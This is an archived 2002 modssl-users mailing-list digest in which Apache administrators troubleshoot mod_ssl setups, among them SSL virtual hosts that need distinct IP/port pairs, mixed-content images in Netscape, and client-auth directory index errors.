From: robert@rdcss.com
Received: from me (rharvey-1.cable.scottsboro.org [12.21.134.137])
	by mail1.rdcss.com (Postfix) with SMTP id 9CFC21BA54
	for ; Wed, 20 Nov 2002 21:57:02 +0000 (UTC)
Message-ID: <038c01c290df$96b8dec0$0500a8c0@rdcss.com>
To: 
References: <484A6CA492BE654395D208B1D8D5393973A552@SOMEXEVS001.ex.ordersx.org> <351028539301.20021120154739@victor-buck.com>
Subject: Re: Re[2]: SSL with multiple domains on same server
Date: Wed, 20 Nov 2002 15:55:49 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from base64 to 8bit by opensource.ee.ethz.ch id WAB01254
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: robert@rdcss.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

are you saying i can use the same ip and two different port to be able to have more than one vhs under ssl?
----- Original Message ----- 
From: "Ludovic Perard" 
To: "Boyle Owen" 
Sent: Wednesday, November 20, 2002 8:47 AM
Subject: Re[2]: SSL with multiple domains on same server


> Hello Boyle,
> 
> Wednesday, November 20, 2002, 3:33:00 PM, you wrote:
> 
> BO> You are trying to run two name based VHs under SSL. You cannot do this
> BO> (see http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47).
> 
> BO> The problem is that SSL encapsulates HTTP so the SSL session has to be
> BO> negotiated before any HTTP traffic can be seen. But the hostname is in
> BO> the HTTP request, so apache cannot decide which VH to use - so it uses
> BO> the first by default.
> 
> BO> You need to use separate IPs and/or ports...
> 
> I'm already using two different IP addresses
> 
> 
> -- 
> Best regards,
>  Ludovic                           
>  ludovic.perard@victor-buck.com
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 23:33:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA03015; Wed, 20 Nov 2002 23:32:24 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dartagnan.telusquebec.com id XAA02997; Wed, 20 Nov 2002 23:31:07 +0100 (MET)
Received: from Neutron ([207.134.3.162])
 by smtp.globetrotter.net (iPlanet Messaging Server 5.1)
 with SMTP id <0H5W00JIEBVPN4@"TELUS Quebec"> for modssl-users@modssl.org; Wed,
 20 Nov 2002 17:31:01 -0500 (EST)
Date: Wed, 20 Nov 2002 17:31:57 -0800
From: Jimmy Godbout 
Subject: RE: graphics don't display in Netscape with SSL on
In-reply-to: 
 
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
Importance: Normal
X-Priority: 3 (Normal)
X-MSMail-priority: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jimmy Godbout 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Usually, it means that the content of the page is a mix of secure/non-secure
elements.

Try to find the request in the log file of your web server.
You'll see if the request is sent to the SSL server or the regular server.
If you want a SSL-only server, you'll have to change those link to point to
your SSL server.

Hope this will help.

Jimmy

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Mitchel, Jennifer
(Jem)
Sent: Wednesday, November 20, 2002 1:19 PM
To: 'modssl-users@modssl.org'
Subject: graphics don't display in Netscape with SSL on


Hi all,

  I finally have my whole site running the way it should with one
exception...

  in Netscape all the graphics on the pages show up as a little key that if
you right click on it for the menu you get in the menu View Image
(internal-icon-insecure).  Is there something I can do to the graphics so
that they display in Netscape?

Thanks
Jem
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 23:42:44 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA03325; Wed, 20 Nov 2002 23:41:33 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ihemail1.firewall.lucent.com id XAA03294; Wed, 20 Nov 2002 23:40:58 +0100 (MET)
Received: from il0015exch001h.wins.lucent.com (h135-1-23-83.lucent.com [135.1.23.83])
	by ihemail1.firewall.lucent.com (Switch-2.2.2/Switch-2.2.0) with ESMTP id gAKMeuV12264
	for ; Wed, 20 Nov 2002 17:40:56 -0500 (EST)
Received: by il0015exch001h.ih.lucent.com with Internet Mail Service (5.5.2653.19)
	id ; Wed, 20 Nov 2002 16:40:56 -0600
Message-ID: 
From: "Mitchel, Jennifer (Jem)" 
To: "'modssl-users@modssl.org'" 
Subject: RE: graphics don't display in Netscape with SSL on
Date: Wed, 20 Nov 2002 16:40:54 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mitchel, Jennifer (Jem)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


 Thanks Jimmy.  I realized the exact same thing a minute ago.  I thought I had copied those images over into the directory served off the SSL server, but I hadn't... they were coming from a non-secure Netscape web server.

-----Original Message-----
From: Jimmy Godbout [mailto:jgodbout@olidium.com]
Sent: Wednesday, November 20, 2002 7:32 PM
To: modssl-users@modssl.org
Subject: RE: graphics don't display in Netscape with SSL on


Usually, it means that the content of the page is a mix of secure/non-secure
elements.

Try to find the request in the log file of your web server.
You'll see if the request is sent to the SSL server or the regular server.
If you want a SSL-only server, you'll have to change those link to point to
your SSL server.

Hope this will help.

Jimmy

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Mitchel, Jennifer
(Jem)
Sent: Wednesday, November 20, 2002 1:19 PM
To: 'modssl-users@modssl.org'
Subject: graphics don't display in Netscape with SSL on


Hi all,

  I finally have my whole site running the way it should with one
exception...

  in Netscape all the graphics on the pages show up as a little key that if
you right click on it for the menu you get in the menu View Image
(internal-icon-insecure).  Is there something I can do to the graphics so
that they display in Netscape?

Thanks
Jem
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 21 09:07:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA18760; Thu, 21 Nov 2002 09:06:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from GATE2.retail-sc.com id JAA18554; Thu, 21 Nov 2002 09:05:17 +0100 (MET)
Received: from mambox.intdus.retail-sc.com (IDENT:root@mambox.intdus.retail-sc.com [10.0.12.1])
	by GATE2.retail-sc.com (8.9.3/8.9.3) with ESMTP id JAA19771
	for ; Thu, 21 Nov 2002 09:03:52 +0100
Received: from mambox.intdus.retail-sc.com (IDENT:jpm@mambox.intdus.retail-sc.com [10.0.12.1])
	by mambox.intdus.retail-sc.com (8.9.1/8.9.1) with ESMTP id JAA17159;
	Thu, 21 Nov 2002 09:03:51 +0100
Date: Thu, 21 Nov 2002 09:03:51 +0100 (CET)
From: Jan-Piet Mens 
To: modssl-users@modssl.org
Subject: DirectoryIndex/Indexes with Client Auth not working
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-G2-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan-Piet Mens 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Apache/2.0.43 (Unix) mod_ssl/2.0.43 OpenSSL/0.9.6b

When I configure a virtual SSL host with basic auth, I can access
the following URLs without problem:

	https://server.name/
	https://server.name/subdir/index.html

Getting a directory index and/or trying https://server.name/subdir and
wanting the index.html is impossible: I get an error 403 returned. There
is no error_log entry, just an access_log entry.

My configuration is currently in an .htaccess file:

	
		SSLRequireSSL
		SSLOptions      FakeBasicAuth +StrictRequire
		SSLVerifyClient require
		SSLVerifyDepth  10
		SSLOptions      +FakeBasicAuth +StrictRequire
		DirectoryIndex  index.cgi index.html
		Options Indexes FollowSymLinks ExecCGI
		AuthName        "RSC RA Authentication"
		AuthType        Basic
		AuthUserFile    /etc/httpd/conf/httpd.passwd
		require         valid-user
	

If I leave out the `require' directive, the DirectoryIndex is processed
(but I am of course not authenticated).

I repeat: If I access a file directly, all is fine.

What am I doing wrong ?

Thanks & regards,
	-JP

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 21 09:48:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA19701; Thu, 21 Nov 2002 09:47:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id JAA19682; Thu, 21 Nov 2002 09:46:25 +0100 (MET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gAL8kJt9009712
	for ; Thu, 21 Nov 2002 09:46:19 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org ([127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gAL8kIOP027785
	for ; Thu, 21 Nov 2002 09:46:19 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Configuring a stand alone SSL enabled apache webserver
Date: Thu, 21 Nov 2002 09:46:18 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393972F718@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: Configuring a stand alone SSL enabled apache webserver
Thread-Index: AcKQyaYt4Y3bNUYJRkSVuijT4J83SAAb5euw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I think you're misunderstanding something about how apache and SSL work.
It is not that you "switch on" SSL over all VHs like it was a Romulan
Cloaking Device...

Rather, SSL (more properly, HTTPS) is a protocol you define for a
particular virtual host. This means the SSL directives *must* go inside
a VH container. The only exception is if you don't use VHs at all and
only have one site which is defined at server config level (i.e. there
are no VH containers at all and only one DocumentRoot). Then the SSL
directives can be at config level.

To put it another way;

- Listen directives tell apache which TCP/IP sockets to listen to.
- DocumentRoot directives tell apache where to find the start each the
site's content.
- VHs map Listens to DocumentRoots, i.e. TCP/IP sockets to directories.
- The protocol to be used (HTTP or HTTPS) is defined separately for each
VH.

Rgds,

Owen Boyle

>-----Original Message-----
>From: Kent Perrier [mailto:kperrier@seitelsolutions.com]
>Sent: Mittwoch, 20. November 2002 14:40
>To: modssl-users@modssl.org
>Subject: Re: Configuring a stand alone SSL enabled apache webserver
>
>
>On Tue, 2002-11-19 at 15:53, R. DuFresne wrote:
>> 
>> As far as I'm aware, and others can correct me if I'm saying 
>something
>> wrong here, the virtual server directives are optional.  The 
>key would be
>> the server root for the ssl based pages to be served, tough 
>enclosing a
>> SERVERROOT directive within the virtual server directives 
>would benefit
>> you in seperation of pages being servered.  don't be overly 
>confused by
>> the virtual server directives, they aren't just for VH 
>hosting .
>> 
>
>The question is, how do I turn SSL on outside of a virtual server?  The
>SSLEngine On directive gives me the "Illegal attempt to re-initialize
>SSL for server" error.  I comment this out, the server starts, I see
>mod_ssl listed in the error_log when the server starts and the 
>server is
>listening on port 443, but it will not accept SSL connections.  I now
>have a standard web server running on port 443, not 80.
>
>FYI, I don't really want to seperate the pages being server, I need
>apache to be the front end for a Tomcat based e-commerce 
>application and
>I am having problems with getting mod_jk working inside the virtual
>server that hosts the SSL enabled server.  I decided to go 
>this route as
>I thought it would be easer and server resources are not an issue.
>
>Kent
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 21 09:50:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA19759; Thu, 21 Nov 2002 09:49:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id JAA19743; Thu, 21 Nov 2002 09:48:57 +0100 (MET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gAL8mut9010096
	for ; Thu, 21 Nov 2002 09:48:56 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org ([127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gAL8muOP027883
	for ; Thu, 21 Nov 2002 09:48:56 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Re[2]: SSL with multiple domains on same server
Date: Thu, 21 Nov 2002 09:48:56 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A558@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: Re[2]: SSL with multiple domains on same server
Thread-Index: AcKQ4HZ3OpLAj48vRZ2Svw/kKLTlEwAWiLcg
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>-----Original Message-----
>From: robert@rdcss.com [mailto:robert@rdcss.com]
>
>are you saying i can use the same ip and two different port to 
>be able to have more than one vhs under ssl?

Certainly. e.g.

Listen 192.168.1.1:443

..etc

Listen 192.168.1.1:444

..etc

The rule is: SSL VHs must be distinct at TCP/IP level (i.e. ip addr and
port pair must be distinct).

Rgds,

Owen Boyle

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 21 11:00:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA21871; Thu, 21 Nov 2002 10:59:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns1.victor-buck.com id KAA21867; Thu, 21 Nov 2002 10:58:56 +0100 (MET)
Received: from 127.0.0.1 (unknown [172.16.3.10])
	by ns1.victor-buck.com (Postfix) with ESMTP id 0586A13FC6
	for ; Thu, 21 Nov 2002 10:41:00 +0100 (CET)
Date: Thu, 21 Nov 2002 10:58:47 +0100
From: Ludovic Perard 
X-Mailer: The Bat! (v1.61)
Organization: Imprimerie Victor Buck
X-Priority: 3 (Normal)
Message-ID: <701097603900.20021121105847@victor-buck.com>
To: Boyle Owen 
Subject: Re[4]: SSL with multiple domains on same server
In-Reply-To: <484A6CA492BE654395D208B1D8D5393973A553@SOMEXEVS001.ex.ordersx.org>
References: <484A6CA492BE654395D208B1D8D5393973A553@SOMEXEVS001.ex.ordersx.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ludovic Perard 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello Boyle,

Wednesday, November 20, 2002, 4:14:45 PM, you wrote:

>>-----Original Message-----
>>From: Ludovic Perard [mailto:ludovic.perard@victor-buck.com]
>>
>>I'm already using two different IP addresses
>>

BO> Then it should work. Are you sure? 

BO> Try defining the IP addresses explicity to reveal any DNS
BO> misconfigurations:

BO> Listen 192.168.1.1:443
BO> 
BO> ...
BO> Listen 192.168.1.2:443
BO> 
BO> ...

I tried with your manner and it doesn't change anything...

All sites take the same certificate... :/

Can the problem comes from the IP. We are using network adresse
translation and all IP on the web server are 172.x.x.x, so, I tried
with :



but no success.

-- 
Best regards,
 Ludovic                           
 ludovic.perard@victor-buck.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 21 11:35:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA22954; Thu, 21 Nov 2002 11:34:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns1.victor-buck.com id LAA22938; Thu, 21 Nov 2002 11:33:34 +0100 (MET)
Received: from 127.0.0.1 (unknown [172.16.3.10])
	by ns1.victor-buck.com (Postfix) with ESMTP id A5CB213FC6
	for ; Thu, 21 Nov 2002 11:15:43 +0100 (CET)
Date: Thu, 21 Nov 2002 11:33:35 +0100
From: Ludovic Perard 
X-Mailer: The Bat! (v1.61)
Organization: Imprimerie Victor Buck
X-Priority: 3 (Normal)
Message-ID: <1631099691002.20021121113335@victor-buck.com>
To: modssl-users@modssl.org
Subject: Re[5]: SSL with multiple domains on same server
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ludovic Perard 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello Boyle,

  I found the solution :
  
  The line "BindAddress *" need to be uncomment.

  Now, all works fine :)

-- 
Best regards,
 Ludovic                           
 ludovic.perard@victor-buck.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 21 13:12:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA26853; Thu, 21 Nov 2002 13:11:08 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id NAA26846; Thu, 21 Nov 2002 13:10:37 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gALCAbt9008167
	for ; Thu, 21 Nov 2002 13:10:37 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gALCAaEm008821
	for ; Thu, 21 Nov 2002 13:10:36 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Re[5]: SSL with multiple domains on same server
Date: Thu, 21 Nov 2002 13:10:36 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A55D@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: Re[5]: SSL with multiple domains on same server
Thread-Index: AcKRSdglohAfKuydR6e2ND8D4ECDzgADLoEw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Great! But do you know why?

BindAddress is a deprecated directive which is replaced by Listen. What
you have done is said to apache, "listen to all active IP addresses". 

I think the real problem is to do with your NAT (which you didn't
mention on your original post). This meant that the IP addresses your
browser was using were different from the incoming IP addresses on the
apache box. If you had used Listen with the real IPs, it would've worked
too.

>-----Original Message-----
>From: Ludovic Perard [mailto:ludovic.perard@victor-buck.com]
>Sent: Donnerstag, 21. November 2002 11:34
>To: modssl-users@modssl.org
>Subject: Re[5]: SSL with multiple domains on same server
>
>
>Hello Boyle,
>
>  I found the solution :
>  
>  The line "BindAddress *" need to be uncomment.
>
>  Now, all works fine :)
>
>-- 
>Best regards,
> Ludovic                           
> ludovic.perard@victor-buck.com
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 21 13:35:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA27336; Thu, 21 Nov 2002 13:34:08 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imo-m03.mx.aol.com id NAA27332; Thu, 21 Nov 2002 13:33:41 +0100 (MET)
From: camccuk@netscape.net
Received: from camccuk@netscape.net
	by imo-m03.mx.aol.com (mail_out_v34.13.) id m.1af.326cec2 (16237)
	 for ; Thu, 21 Nov 2002 07:33:25 -0500 (EST)
Received: from  netscape.net (mow-d20.webmail.aol.com [205.188.139.136]) by air-in03.mx.aol.com (v89.21) with ESMTP id MAILININ31-1121073325; Thu, 21 Nov 2002 07:33:25 1900
Date: Thu, 21 Nov 2002 07:32:35 -0500
To: modssl-users@modssl.org
Subject: RE: Configuring a stand alone SSL enabled apache webserver
MIME-Version: 1.0
Message-ID: <5A84F481.2071DE0E.001D8163@netscape.net>
X-Mailer: Atlas Mailer 2.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: camccuk@netscape.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

"Boyle Owen"  wrote:

>Rather, SSL (more properly, HTTPS) is a protocol you define for a
>particular virtual host. This means the SSL directives *must* go inside
>a VH container. The only exception is if you don't use VHs at all and
>only have one site which is defined at server config level (i.e. there
>are no VH containers at all and only one DocumentRoot). Then the SSL
>directives can be at config level.
>
>To put it another way;
>
>- Listen directives tell apache which TCP/IP sockets to listen to.
>- DocumentRoot directives tell apache where to find the start each the
>site's content.
>- VHs map Listens to DocumentRoots, i.e. TCP/IP sockets to directories.
>- The protocol to be used (HTTP or HTTPS) is defined separately for each
>VH.

When is some nice company gonna pay Owen to put all his highly original, succinct and illuminating explanations into a wee book?

Cheers,
cam
-----------------------------------------
camccuk@netscape.net


__________________________________________________________________
The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp 

Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 21 20:38:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA12319; Thu, 21 Nov 2002 20:37:17 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from webmail.sub.ru id UAA12312; Thu, 21 Nov 2002 20:36:48 +0100 (MET)
Received: (qmail 74181 invoked by uid 0); 21 Nov 2002 19:37:34 -0000
Received: from unknown (HELO shuttle.svib.ru) (195.54.219.242)
  by webmail.sub.ru with SMTP; 21 Nov 2002 19:37:34 -0000
Date: Thu, 21 Nov 2002 22:35:59 +0300
From: Alex Povolotsky 
To: modssl-users@modssl.org
Subject: Problem with... proxy? Module? Or what?
Message-Id: <20021121223559.17535a76.tarkhil@webmail.sub.ru>
Organization: sub.ru
X-Mailer: Sylpheed version 0.8.2claws (GTK+ 1.2.10; i386-portbld-freebsd4.4)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Povolotsky 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello!

I'm running FreeBSD, and apache/mod_ssl with virtual hosts in jailed environment. Jail means that I can have only one IP address for apache, ipfilter's ipnat is used to multiplex several external IPs.

I also need to support https virtual hosts, and here my troubles begins.

Of course, I could not use pure name-based virtual hosts, and I even understand, why.

What's a bit worse, that I seems to be unable to obtain data from /dev/ipl from inside the jail.

Maybe someone can guide me towards proper proxy? Things like mod_real_ip should not help much, and I'm still trying to make pound (http://www.apsis.ch/pound/) to work.

Having received https connection via some proxy, how can I pass SSL variables by the easiest way?

-- 
Alex.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 21 21:27:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA13620; Thu, 21 Nov 2002 21:26:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id VAA13608; Thu, 21 Nov 2002 21:25:28 +0100 (MET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id PAA17735;
	Thu, 21 Nov 2002 15:25:21 -0500
Date: Thu, 21 Nov 2002 15:25:20 -0500 (EST)
From: "R. DuFresne" 
To: Alex Povolotsky 
cc: modssl-users@modssl.org
Subject: Re: Problem with... proxy? Module? Or what?
In-Reply-To: <20021121223559.17535a76.tarkhil@webmail.sub.ru>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 21 Nov 2002, Alex Povolotsky wrote:

> Hello!
> 
> I'm running FreeBSD, and apache/mod_ssl with virtual hosts in jailed environment. Jail means that I can have only one IP address for apache, ipfilter's ipnat is used to multiplex several external IPs.
> 
> I also need to support https virtual hosts, and here my troubles begins.
> 
> Of course, I could not use pure name-based virtual hosts, and I even understand, why.
> 
> What's a bit worse, that I seems to be unable to obtain data from /dev/ipl from inside the jail.

